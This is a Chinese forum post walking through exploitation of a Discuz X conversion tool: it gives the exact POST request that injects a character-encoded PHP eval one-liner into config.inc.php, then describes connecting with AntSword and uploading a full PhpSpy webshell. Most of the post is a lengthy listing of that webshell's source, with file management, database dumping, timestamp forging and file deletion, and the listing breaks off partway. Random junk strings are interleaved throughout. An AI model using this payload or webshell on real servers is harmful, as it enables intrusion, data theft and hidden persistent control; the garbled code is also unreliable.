网络安全实战之discuz上传漏洞利用

fudyou · 发表于 2022-6-25 09:01:11

攻击思路：% y! I: c/ K+ }. c
想要拿下一台主机A的权限：
, u9 j7 r2 Z3 t0 a6 I& S) n2 w1、了解一下这个服务器：端口，服务器版本，操作系统版本。找漏洞/ @: y6 H  r9 C" `$ }/ X) m
2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器，就利用对方网站应用程序的漏洞，上传webshell然后提权
' |7 @0 g7 J" j  ~3、传上去后，得到apache用户普通权限，再提权成root  {/ y$ g0 [# Z5 P4 Q, Z! ^
概述：
4 \1 r) p0 f& H' b这突破在一个DZ X系列自带的转换工具里面。. G1 G7 x! {0 I! H& E
漏洞路径：utility / convert / data / config.inc.php
# J* [5 ^. f+ ~2 I6 d1 Q9 [. i漏洞发生的原因是：config.inc.php这个文件在黑客通过post写入时，无仸何过滤检测，所以通过post方式往config。inc.php中写木马程序。
7 S$ k3 W2 q: C触发突破过程：* x" k: O5 N( I3 I0 p$ [& o
1、在浏览器中访问打开http://192.168.1.63/utility/convert/index.php  " x/ J. L8 V* @+ I# f; h
2、使用/utility/convert/index.php迚行版本转换3，config.inc.php文件没有做过滤，可以使用POST方法对config.inc.php注入木马程序, H/ W& a( b/ r/ }
攻击过程：6 @1 f9 J  x: N8 n* R6 Q
1、打开burp设置报文拦截，然后使用浏览器访问http://xxxxxxx.cn//utility/convert/% H) k9 M! S# U/ S* v) H
) q! z6 r! ^5 y5 [
. T& X# h3 W  d' q; }! j/ R/ r
2，右键单击空白处，选择发送到中继器，将报文发到中继器

3、然后在中继器中查看信息：

4、修改第一行：GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP / 1.1将第一行内容修改为：

POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

这是一个经过加密的一句话木马解密后内容如下：

POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa eval("$_POST[c];"););

eval（）凼数中的eval是评估的简称，这个凼数的作用就是把一段指向PHP语句来执行

5、修改完成后发送数据包

6、刚刚上传的文件路径：http://xxxxxx.cn/utility/convert/data/config.inc.php

代码详细：

可以看到和我们修改提交的参数类似。而且多了很多^ M符号。

扩展：^ M符号^ M字符的来历和作用：在DOS/Windows里，文本文件的换行符为\r \n，而在linux系统里则为\n，所以DOS/Windows里编辑过的文本文件到了linux里，每一行都多了个^ M。所以^ M只是一个换行符号，没有实际的用处，我们可以将它保留，也可以将它删除，％0a％0d等于\r\n

7、祭出祖传的中国蚁剑连接刚才上传的一句话木马: F+ L, m6 P! {7 ?# G
7 D% ~ w+ \" q: I! i S& `
8、通过中国蚁剑上传大码
* }/ m2 Y" ~3 G/ x; S$ Q4 o5 ?4 i$ h, o" n1 u
8 L4 r- ?0 W/ q. Z: [, k( z* S
10、任意机器访问我们的webshell2.php木马文件，浏览器输入http://xxxxxx.cn/utility/convert/data/webshell2.p hp输入密码：cmd

webshell代码如下：

<?php( i7 W" A Y. i
7 w' [1 o# e5 E
/*****************************************************************************: R& Z) @, q% g4 z5 V' G$ x
1 p+ a* s$ e* u: J; q
===================== 请误用于非法用途，造成一切后果与本人无关。====================3 J7 T7 {( r7 p! D% i
$ N) M: a& g9 c0 K
====! L, K, F- n- p0 l
: n8 H T C& H' g6 \% {
1 R8 U1 u9 D! H' r9 ]
*****************************************************************************/
+ G- ?0 y! e, j" |0 q, b1 z' O
7 s: z3 y9 N& Y1 V; ?
error_reporting(7);1 W! G. A( v( h. p
@set_magic_quotes_runtime(0);
1 w, O6 H8 M p$ C3 k; b
ob_start();
! |! x) G+ q/ \
$mtime = explode(' ', microtime());
! Q. L7 v0 u- }: u. C8 ?1 b
$starttime = $mtime[1] + $mtime[0];
) Y4 K& I2 F# H& R
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
* {, }! `$ ~' p
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );3 O& }$ S& A+ T3 T. X& t* G
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
7 ]4 ~3 G2 |; h9 }5 U! [9 l
define('IS_COM', class_exists('COM') ? 1 : 0 );
( J1 U' C; S! u& U9 I
define('IS_GPC', get_magic_quotes_gpc());
: A. Y; f( K3 I; K
$dis_func = get_cfg_var('disable_functions');
% N" I0 Q0 P/ ?4 _5 a3 T) K2 m
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
) l( j% o4 K" m& u/ B. l
@set_time_limit(0);8 |+ G( }1 E" ^: {; U; @5 r: [" h
5 c Z7 R5 F, {/ U! M4 s
foreach(array('_GET','_POST') as $_request) {7 C) j9 p, W5 g% z" e1 k- `. \
foreach($$_request as $_key => $_value) {
3 t& O% a: R: I3 C. O5 Z& z0 T
if ($_key{0} != '_') {
1 u( ~' o) }& d: ?
if (IS_GPC) {
* z/ T; a- o, t: Q# M* w& @2 d( D6 w) ~
$_value = s_array($_value);+ \# Q' V+ F; e- g1 y! t2 l
}: Z! \( e$ @3 D9 E
$$_key = $_value;
( S y2 w3 @/ O2 f1 ]7 y: F5 a# l" R
}
. I6 E2 S9 Z- U; [" {9 K
}
4 s' J5 l/ U7 X! R2 G5 f
} G j( Y/ G% `0 d
* J# e* W8 \, a: J
/*===================== 程序配置 =====================*/% Y& p+ f8 x1 k; T0 b k& A: \% Z2 z! b
$admin = array();
( `4 C: M7 N; |# Q4 X
// 是否需要密码验证, true 为需要验证, false 为直接进入.下面选项则无效- |' [/ R4 S' |+ N
$admin['check'] = true;
( N/ q: p0 q: {& O- p
// 如果需要密码验证,请修改登陆密码
5 P: J5 o# w& e0 j
$admin['pass'] = 'xuegod';
' S# e; \0 T Y/ N
/ S R" e+ R: M* s0 o
//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认6 S2 P$ \* P+ m& A6 `+ S
// cookie 前缀
6 v% P7 |. H' w9 y0 @" @* d5 h
$admin['cookiepre'] = '';' N+ m( C: d; j: E
// cookie 作用域
) H3 n/ x9 a4 c* S, N
$admin['cookiedomain'] = '';7 } G2 n. f! o1 K
// cookie 作用路径- j0 V8 e, G( @7 e: b& @
$admin['cookiepath'] = '/';
0 _0 \: H/ v6 m
// cookie 有效期
/ k- {" Q9 L5 F8 ]
$admin['cookielife'] = 86400;
}9 n! ^9 h# [0 ]
/*===================== 配置结束 =====================*/
Z9 ~1 b+ Y5 R& G1 n
& p3 p" I4 `# s1 r
if ($charset == 'utf8') {
( s' c* s: b k) d/ T/ Q% f" c0 |
header("content-Type: text/html; charset=utf-8");9 K& v! N" [7 l6 }3 Z: U
} elseif ($charset == 'big5') {
+ [$ l3 l8 O8 z4 e& F0 p
header("content-Type: text/html; charset=big5");
: W$ i" M& d9 ?- J; _+ L
} elseif ($charset == 'gbk') {
' _1 u( U& |1 F( h9 S, `: u
header("content-Type: text/html; charset=gbk");, m6 P) R* l, R; e6 _% Q0 K
} elseif ($charset == 'latin1') {
) _8 I+ i, |: d/ G% x5 H$ N P, h
header("content-Type: text/html; charset=iso-8859-2");) {" U+ E; S2 R5 ^9 p
}
& J& p, i) z9 _& z
4 O' Z5 ?, {/ }% Y7 s% k6 }
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
- I0 o- v8 t! W5 E9 T5 Q6 S8 e
$timestamp = time();' y/ f( l: N/ [) K) Y
, p! w# \( p: l6 T" m
/*===================== 身份验证 =====================*/
; B' C' M5 c" Z
if ($action == "logout") {
! i6 H* U+ @; s$ Q
scookie('phpspypass', '', -86400 * 365);7 r" }3 @' ]8 |, I! k* i8 u4 P3 C
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');4 w# t" p3 O+ n/ g: o, O
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
* n! Z/ k+ Z8 n6 I- l3 F
exit;
. C6 ^$ W2 M& {" Y$ [
}* q% P, S9 Q# \* s4 [7 s4 W, A8 t
if($admin['check']) { c$ I. @+ i7 p9 E2 v' _+ Z1 J7 K
if ($doing == 'login') {
) o& J# A1 p5 n, M4 Y
if ($admin['pass'] == $password) {
+ ]4 n! M8 s9 e" g. r
scookie('phpspypass', $password);3 k7 O2 ~% E6 Q8 P+ a! m+ j, [& ^
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
8 H$ N! d- I9 H& Z
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
* B/ o- j/ w3 S! m
exit;
% }, y; e$ C3 u# C( M
}
& t# f+ O' \! L2 W6 j- S1 S; ]
}
4 K, r3 x+ r! _0 A. a
if ($_COOKIE['phpspypass']) {8 V# b$ z% L5 q
if ($_COOKIE['phpspypass'] != $admin['pass']) {# d- p7 r5 L4 s, i" W
loginpage();& r9 C/ ]5 V5 a3 I+ p6 G
}
; u: Z/ @% Z F( _5 H
} else {& n' m: p" h% L6 g/ `, B& x
loginpage();) |- r3 A5 X w8 p
}4 a u- C9 N6 J, L
}
' E# f2 s+ F# Y& [. M4 h
/*===================== 验证结束 =====================*/
, V" Q: v S$ k
2 h5 o2 G# `# a( X0 J: P0 [
$errmsg = '';9 h0 [8 q( ^* R% A
4 `9 r, N3 b4 a, ]# x1 D" A
// 查看PHPINFO
8 `6 g i% l. c0 q0 ~2 H7 n5 R
if ($action == 'phpinfo') {
% A: F& T& p1 l! `7 g5 X
if (IS_PHPINFO) {! m8 t7 c6 q+ a8 q2 I/ H
phpinfo();( u) a; M7 p$ o1 P4 q
} else {
6 D1 ^1 T, I# n7 C& V) n
$errmsg = 'phpinfo() function has non-permissible';( l. I' }! w- y( K' ^2 G% r
}
4 w+ I' p8 s/ H0 C
}
5 j0 E# ]* G7 |6 T, o
& E$ i: t* x$ ^6 U1 k6 m
// 下载文件
- I+ K: ]5 ]0 r6 c, @4 R8 Q# \
if ($doing == 'downfile' && $thefile) {
0 o( \( b; [3 m+ i. F5 w
if (!@file_exists($thefile)) {' O1 m' N5 E; {- {
$errmsg = 'The file you want Downloadable was nonexistent';
2 h* R2 O: C' Y; a# U
} else {
, c% H, d# y9 ~* G
$fileinfo = pathinfo($thefile);
* a. R) p& D$ T, A2 O l
header('Content-type: application/x-'.$fileinfo['extension']);9 Q) e& @3 M# ?) n& r: V& U* H
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
1 q/ _4 b7 Q$ N6 R. S
header('Content-Length: '.filesize($thefile));
" L0 r1 K- ^0 Q3 k3 a" i
@readfile($thefile);+ Z, ?1 u/ V4 F2 N5 R
exit;- b3 t) e$ k4 W
}
& g8 `% w% k: F! n8 f. ?4 B
}4 h8 c6 ]0 t) E+ [
" D- k; O2 N9 T Z7 ]. l
// 直接下载备份数据库
- [. ^9 k9 I; f( d
if ($doing == 'backupmysql' && !$saveasfile) {
/ Z3 k! U9 i0 h0 p7 ^+ J& F
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
& h( h' f {! a2 w
$table = array_flip($table);6 G q$ P2 T8 Q S' P4 {
$result = q("SHOW tables");
- g ]5 p$ y( o" ]$ r
if (!$result) p('<h2>'.mysql_error().'</h2>');
+ V3 I2 B" o$ P }
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
( h1 D; a( U4 Z/ D
header('Content-type: application/unknown');
7 |0 P& Y4 T; X2 a. h
header('Content-Disposition: attachment; filename='.$filename);
1 g& x( G8 x0 Z. W6 E/ g9 C5 w# Q
$mysqldata = '';) \) c* z$ W- s2 K' G$ V
while ($currow = mysql_fetch_array($result)) {9 t* {6 |3 h8 v" t ^
if (isset($table[$currow[0]])) {8 _# K9 }# A" i9 E) s9 B5 `
$mysqldata .= sqldumptable($currow[0]);1 z, q" |) x' D1 w' N- M3 H
}
( y8 E" M. d: z. B# f/ K8 i
}
8 @% b( W4 K: E* C. S D
mysql_close();
3 Q* J* a! S. A, z+ \
exit;
3 {3 _2 u9 E( i0 E& d
}8 y$ G1 o# d- e& D3 _6 y$ P
; A: E) Z; {/ y: _
// 通过MYSQL下载文件
$ { w! y7 {* Y# L
if($doing=='mysqldown'){
5 ]* T5 h" q- c, j& N9 ?! i8 k
if (!$dbname) {8 o! B" p# n- q1 u
$errmsg = 'Please input dbname';
# U7 c; X* @: ?
} else {8 t; V8 Y6 E9 W) d1 z
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
" h3 z* }' ^6 X" E/ N
if (!file_exists($mysqldlfile)) {, k: r& y1 z0 Q) q, d
$errmsg = 'The file you want Downloadable was nonexistent';
4 z& a4 h3 V0 C6 |7 s
} else {
' e; S# F+ V& Q j/ H
$result = q("select load_file('$mysqldlfile');");2 j/ f! m/ r' U
if(!$result){
# W: Z9 N- w4 m) s2 m% r
q("DROP TABLE IF EXISTS tmp_angel;");
! J3 j, ]& r' h4 t( c
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
" z- `3 v5 Y# o5 j
//用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况- g5 |: \* g) C% }) B E, m
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
% i# p% Y' F5 X k
$result = q("select content from tmp_angel");+ j9 P% F* k$ @( J7 A% }/ a
q("DROP TABLE tmp_angel");' D' |# @* s9 w% T6 X# _+ g% h
}
* B. j2 K3 f( l8 C& }$ U/ T# d% q
$row = @mysql_fetch_array($result);; B6 b! c N+ t) Z3 t' A: S' F. A
if (!$row) {
2 g% e3 g! i! j7 M& ~
$errmsg = 'Load file failed '.mysql_error();* E! z. e; _5 m: `
} else {+ i p' r/ P" }; v
$fileinfo = pathinfo($mysqldlfile);
, k7 a5 \9 e3 A, Z
header('Content-type: application/x-'.$fileinfo['extension']);7 p9 P' k& f! S4 q$ p; b
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
2 R( C9 f- D! X- W+ @
header("Accept-Length: ".strlen($row[0]));
( O4 ^8 Q& h8 n' y8 A
echo $row[0];4 ]$ b9 F$ H. T0 c
exit;
5 \/ Z; s; ]% I* e- A3 l5 ? N
}
0 u2 i$ t1 |' g4 c6 U8 ?( x
}
0 r& I3 a1 A4 v0 f
}
# y" ^! U2 V$ w- P
}5 @( j6 W! M" y0 F e
3 }$ Q& ]) e, |3 q+ {
?>
8 ^7 m- D/ S1 F( o, D
<html>
2 W3 E9 ?! h" F9 X+ }" P
<head>, W% b' s9 c6 Z) H1 \* r
<meta http-equiv="Content-Type" content="text/html; charset=gbk">/ e i! b2 h! `2 f
<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
( v" M& g& S- U7 d7 ?/ ~3 k
<style type="text/css">: m) C- }3 s* X- Y
body,td{font: 12px Arial,Tahoma;line-height: 16px;}* C3 |/ a( M* M; Z8 E8 B
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
6 a$ N$ {+ n. Y' d- C1 W) ]) W6 z1 t
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
- |. d+ e% ?; {# d2 C3 |
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}7 O+ a0 q; `2 f. k3 T F; b8 [
a {color: #00f;text-decoration:underline;}1 F+ Y/ A! \- ~% n' Y
a:hover{color: #f00;text-decoration:none;}
o4 b& H/ s% r+ S6 ?
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}) a# Z: ^5 D: e+ m! {" z& Q8 R
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
7 P* \4 D K1 P# X
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}* {' y# F. z. S `: P4 R
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
. [: K* Y! C' H
.head td span{font-weight:normal;}
, B9 y3 [ `; q: v8 e9 P4 ~) ^4 O
form{margin:0;padding:0;}
9 ]+ e: l6 U' u5 h
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
( a f( n2 A. v2 v8 k) }9 Y' S
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}1 M* e S/ Y/ e$ f
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}& S& I; H' \$ s8 ^" |. C
</style>1 L# M, H% r, V( Z% A8 P
<script type="text/javascript">
6 x$ S" e3 Y# ~1 m
function CheckAll(form) {
) b: ^1 o6 r3 w- s! L
for(var i=0;i<form.elements.length;i++) {
; A. c) x! R/ x- x0 Z% B/ R8 A
var e = form.elements[i];3 B4 z% r& `* R( C0 {4 T
if (e.name != 'chkall')6 O! y! J% \. K& K" u4 A
e.checked = form.chkall.checked;
) { z+ @# r$ g+ w/ B, c+ B" H
}1 K+ M# g! ^2 t1 {
}
- [0 y6 T/ `3 ~( G# J* l7 L2 e
function $(id) {9 Z3 c+ J% k+ b/ J: l
return document.getElementById(id);& A+ q! }- P, D5 }1 K4 _
}0 f4 u! F/ D# {1 I
function goaction(act){0 H* {# s& p& q6 ]9 h& J
$('goaction').action.value=act;" q" s0 Z5 P6 E6 \- f
$('goaction').submit();2 b D* C+ _( B0 {2 l+ C* s
}
$ h7 L! x5 W+ ~$ q7 f
</script>
# `" y o. R5 i0 v' D
</head>
5 z. g( r# j" n* f2 ~( r
<body style="margin:0;table-layout:fixed; word-break:break-all"># r x: ]% z8 X1 W7 _2 N/ f3 }
<table width="100%" border="0" cellpadding="0" cellspacing="0">; j3 @2 Y- M$ c9 \
<tr class="head">
; N* @' X _4 X( L" q; O
<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
( D6 K) @6 l+ d; z
</tr>6 ]/ r) M' x( I1 k; _% U
<tr class="alt1">
' y' R- u$ n% J5 W
<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>! Z1 O8 ^) W1 A, \' V
<a href="javascript:goaction('logout');">Logout</a> |
6 ^: D9 H6 L2 D& O5 T
<a href="javascript:goaction('file');">File Manager</a> |
2 K& c2 [7 W1 F& E: z
<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
2 y6 U: J9 a( i
<a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
1 Q7 m" i- f" [- {# _4 |
<a href="javascript:goaction('shell');">Execute Command</a> | L) _! ]: d6 p: @' O+ F
<a href="javascript:goaction('phpenv');">PHP Variable</a> |
) x1 n$ y( l+ u* b; V+ I
<a href="javascript:goaction('eval');">Eval PHP Code</a>
# A0 k4 F0 r5 V' D6 Z( u% R2 J
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
0 p1 g3 w1 t4 K3 C( ] q9 _
</td>; Q4 U* w. A, X5 X
</tr>
4 N L% v7 z; F( L5 D$ }5 w
</table>6 h* {! c6 \+ u* e. Y1 B9 p
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td># O3 H, Z ^7 X# j7 ~3 ~1 \
<?php
y! E1 C" s8 Z( w0 [
; ] I4 @# s5 J' M5 J7 n) e& a, y
formhead(array('name'=>'goaction'));
& o Q2 \& Q1 i; \% H$ N
makehide('action');9 Y3 v1 {! E3 |; P/ D) _7 N7 a
formfoot();( r: |! P8 j) b, m9 G' c
/ p3 Q& w6 D1 \+ [
$errmsg && m($errmsg);
, K& Y/ S4 r; }0 n) K* U
. Y7 I. a. k0 h3 n6 ?6 a9 m) k, B
// 获取当前路径
; e2 E& k( D2 I, h) r
!$dir && $dir = '.';
0 @/ L6 X: k6 p8 g' n6 J( _ r; `9 z
$nowpath = getPath(SA_ROOT, $dir);
) a3 h" `- I6 }/ N, m
if (substr($dir, -1) != '/') {; p9 O) y' e+ \* x: H
$dir = $dir.'/';
# X6 u2 }' q0 H) N4 ~( }% N
}9 |+ n- d; }- k1 n# G/ d1 ?
$uedir = ue($dir);
' b/ q# x( P: [4 G
# K- P( e' |, h7 l9 C; h
if (!$action || $action == 'file') {& I4 O4 ^1 u4 w4 L9 B
U0 V: ]8 L, a1 n5 \! M& N
// 判断读写情况6 x7 M( I$ k4 @) G' U4 S! X6 [% H
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';& q. |' f& A e# D3 N) y
" A& H; F3 d! ?! s7 e
// 删除目录1 {- l+ s/ e. s/ a
if ($doing == 'deldir' && $thefile) {% }* ~" a: H% N% N: ^) b
if (!file_exists($thefile)) {
( ~: K4 N" X( z% J( V+ O
m($thefile.' directory does not exist');
9 ]1 {" @/ Q7 w
} else {
" x9 j5 }; h3 c; ]" _+ A, `
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));* T5 s; G" g0 s! ]- m, @7 h9 a
}
( k( O$ H( y, G; |0 N& N
}( H7 ` A& r# y; A7 ^8 I! X
$ H# t! h& R' e4 L- ?5 K
// 创建目录4 P8 B3 e8 H. [. \% y" }
elseif ($newdirname) {
9 l- T, w$ W2 H9 j, m
$mkdirs = $nowpath.$newdirname;
/ q! Q' v# v4 }9 J9 J/ O
if (file_exists($mkdirs)) {
5 b6 T2 h2 A, |' J
m('Directory has already existed');
+ }' _4 y# g$ @, Y. g4 K
} else {
. o" M) |7 |- @
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); w5 G1 c3 o) X
@chmod($mkdirs,0777);% t5 j6 ^ N3 v T$ k% h2 s' T' W: p O
}
, R7 {8 m- X6 F4 N7 G
}! F$ E/ n% [# ~/ a
; T& d: v9 b" O: a$ e' i4 A0 w
// 上传文件
' Y! U5 h% y0 j4 f
elseif ($doupfile) {" h9 ^; q2 V# q1 k$ v
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));8 O; k4 q0 z" @
}
# C, r3 R" T( J2 B( q/ V: x
& [$ S8 F# y! P/ Y, u' M
// 编辑文件
! O2 w f. Q! h# q) {% b
elseif ($editfilename && $filecontent) {2 t. R2 A: x" a/ a+ }6 B
$fp = @fopen($editfilename,'w');$ b9 q. H2 m& q9 T1 l$ I# X
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));/ P6 t: [& B/ h7 M0 `) L
@fclose($fp);. d ~4 f% Z" h7 q" U7 j$ _
}1 J; h! ?7 g3 W0 Y" T" Z
# Q! a6 W9 L6 b0 H6 [% J. q6 T* t
// 编辑文件属性
3 M2 g6 R n6 S2 J7 j) F
elseif ($pfile && $newperm) {
# u Y7 S7 l$ q
if (!file_exists($pfile)) {
, H- \4 b( x: r6 h. m8 z
m('The original file does not exist');
1 g- ?9 R" q5 g
} else {
9 m& @, a9 M/ R# y Q! B
$newperm = base_convert($newperm,8,10);- z) l* P3 N! u: U
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
1 ~- w! v1 m! _$ @
}
' B9 t! l2 [4 Q) G4 w( x% ?" w
}& m% l: R# Y4 o# z) \+ i
4 x) }, a w" x3 z! z3 u( s5 c' [/ \
// 改名, \) z7 H: A4 i0 K4 i, U& ^
elseif ($oldname && $newfilename) {
$ r, d* l0 `# J% g# X
$nname = $nowpath.$newfilename;0 g; P+ Y& d8 i$ u# Z% r
if (file_exists($nname) || !file_exists($oldname)) { `9 E1 k, E1 m% V$ Y
m($nname.' has already existed or original file does not exist');
+ O# k3 {0 B& t
} else { y4 b6 A% M2 m
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
0 o D: Z3 T7 ^7 _( s6 n
}7 x- o% T/ N2 }& ~+ G: Q& l- o
}
: l$ d% s5 J- h; j$ D4 [( g
: h# E$ @ }1 Y. m2 }& F
// 复制文件2 e( _) @3 S5 _$ w j
elseif ($sname && $tofile) {
: m9 |8 q% m) }8 W$ U+ f0 J, i% N
if (file_exists($tofile) || !file_exists($sname)) {, y4 Z! J9 j0 F! f
m('The goal file has already existed or original file does not exist');
& a4 l6 {) O" e9 M! p0 t* f8 R: B
} else {9 D0 ]+ |4 ], b5 v* |9 a/ {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
7 K" H$ t w- D) T
}5 y! @: ]8 I; f: V4 z) z
}
0 Z U% S1 O L0 B3 x# T% ^- G
: D! Z% M4 d$ S; {2 Z
// 克隆时间
. d& L! f7 {, h) N/ t d8 Y
elseif ($curfile && $tarfile) {
1 `& {1 G! F* H3 m" J' z# y- Q
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
6 D: T) J4 [2 c5 {( H3 z9 u& f
m('The goal file has already existed or original file does not exist');! f- }$ [4 B5 L9 A2 r0 W& H
} else {4 F3 @9 p2 \1 x6 H
$time = @filemtime($tarfile);0 q8 ~6 c5 W3 V. n( I% `
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
7 d) v+ d: h$ E
}
/ n4 c2 W+ l ?: v M
}9 J+ L% n% W+ r
. D' e1 V* u& _" A# w+ h# T
// 自定义时间' p) G3 o- m9 [
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {! q2 s# x9 w; |' W( k" y, ?; A! Y
if (!@file_exists($curfile)) {& g# H9 ]( K4 X( [$ l' {# f( A
m(basename($curfile).' does not exist');
7 k. G1 X0 N9 A0 W6 I: Z' j4 d2 w0 E
} else {+ D- @8 y1 I0 R/ E
$time = strtotime("$year-$month-$day $hour:$minute:$second");
( _/ R$ C8 u/ h8 c& c
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));! {0 t: ]' c6 v1 |# g {( j* y: }
}
' y( V- f+ }9 E8 a: z: f6 b
}
4 f& j6 U! B$ ^4 c' _8 @
4 d+ X2 ?' W0 O% V& [
// 打包下载0 p- W9 X0 @' F
elseif($doing == 'downrar') { J9 s2 U0 l( H2 c+ H3 [; U& X
if ($dl) {
7 V4 H6 j8 W$ S5 }7 ]: [
$dfiles='';
4 }5 T8 p% ]9 S6 g0 ^
foreach ($dl as $filepath => $value) {* a; g% G) T9 I4 U2 K' A
$dfiles.=$filepath.',';, m U% ^7 @# X
}1 D" G& `7 w; [& s1 O: \
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
2 }1 u6 U! U4 `8 ^5 g/ [
$dl=explode(',',$dfiles);
6 R0 f7 o' h, [) A
$zip=new PHPZip($dl);
3 i: y; [) s4 E0 t9 e; d
$code=$zip->out;
$ w+ {/ G" f) ~2 j. u
header('Content-type: application/octet-stream');! P( w. V+ {* G- E8 m- d+ j" K
header('Accept-Ranges: bytes');
5 j7 }7 V3 O5 i
header('Accept-Length: '.strlen($code));& b$ k7 n8 l j5 |1 Y/ V" H, s
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
5 h6 ~' T9 r0 g( t8 g) _: D
echo $code;
; {4 z% Q0 z3 b. u2 b8 L
exit;
4 L6 k8 ~; }+ P' l
} else {
8 Q9 i8 c' L: i, Q& x* o X
m('Please select file(s)');2 S+ W7 _. o w
}" g4 N( n& v! n" g
}
% K$ q) R/ D' o/ i% w" O
! T* L4 F3 X4 f2 h( _, S& b. ^
// 批量删除文件
$ z; _3 m" W: t( I( W
elseif($doing == 'delfiles') {
$ A+ N" h3 R$ Z8 q3 q' c
if ($dl) {) O o/ y C) H+ t# S5 a# y1 a
$dfiles='';* o7 q+ E& I$ [0 I |
$succ = $fail = 0;
! O" Q% D+ ^! C5 ]
foreach ($dl as $filepath => $value) {3 W! ^9 r* z1 a
if (@unlink($filepath)) {
% k# i( g" f6 P n. X, T) L
$succ++;
) Q& c9 |; U2 A6 m' h. S
} else {
8 t: M2 r. e( S5 C
$fail++;
6 l- X6 E7 H9 D+ U9 M) k
}/ J3 L- s( }! M; E. _
}
4 m6 L5 f O$ |3 E3 l. r# O+ U
m('Deleted file have finished，choose '.count($dl).' success '.$succ.' fail '.$fail);% U1 q' t/ D( l1 I0 {- F
} else {4 ~6 u. t' U: J) ~
m('Please select file(s)');% }7 F9 i, n9 F2 l& f( Y( G
}8 \5 d) l R, d7 y2 a
}
# l) _6 h `; m/ Y+ X6 H
4 F4 b) |$ o) e) d% j
//操作完毕* j2 L( \( Y1 ~" n* G
formhead(array('name'=>'createdir'));$ G) n5 I; \7 b! {6 T, U* A
makehide('newdirname');, j8 B }/ l- |% [
makehide('dir',$nowpath);
2 r1 X" X' W( d4 u
formfoot();
5 x/ \ Z/ o, Q: v1 Q6 k0 M
formhead(array('name'=>'fileperm'));* r' b9 l4 t Y
makehide('newperm');
1 ^0 u9 r' Z/ c* c6 q; _
makehide('pfile');
$ |. y" F" s2 o! [$ S
makehide('dir',$nowpath);4 N& p' o! f/ G2 O
formfoot();2 G/ p& I- z# I* X6 a
formhead(array('name'=>'copyfile'));
7 Q' {3 F. U- v3 `3 v; |: P
makehide('sname');* z. Y) s+ T' f$ E
makehide('tofile');8 w2 d y% g) b' m7 r. Y
makehide('dir',$nowpath);+ F0 _* s6 u% j/ R3 @5 H
